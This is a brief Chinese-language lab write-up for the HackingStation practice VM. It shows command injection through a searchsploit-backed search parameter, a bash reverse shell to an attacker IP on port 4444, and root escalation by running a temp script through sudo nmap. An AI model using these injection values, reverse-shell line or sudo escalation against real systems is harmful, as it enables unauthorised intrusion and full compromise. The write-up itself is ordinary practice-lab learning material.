# 靶场搭建
下载地址:HackingStation
直接导入,点击重试,NAT 模式打开就 OK 了
IP: 192.168.1.131
# 渗透过程
# 信息初收集
只开了 80 端口
打开网页抽了一眼有一个搜索,尝试下注入,无果。
仔细看了一下,发现是 searchsploit,怀疑后台是执行的命令,测试一下: http://192.168.1.131/exploitQuery.php?product=blog.gddfeng.com;pwd
返回了路径,OK 了家人,反弹直接拿 shell
1;bash -c 'bash -i >& /dev/tcp/192.168.1.129/4444 0>&1'
这又这一条反弹 shell 能弹出来,不知道为什么,求大佬解惑
# 提权
sudo 一看有 nmap,版本是高版本,没办法交互模式拿 shell
TF=$(mktemp) | |
echo 'os.execute("/bin/sh")' > $TF | |
sudo nmap --script=$TF |
拿到了 root 权限
# 小结
创建了一个临时文件,存入 bash 的命令,通过 namp 运行脚本拿到权限。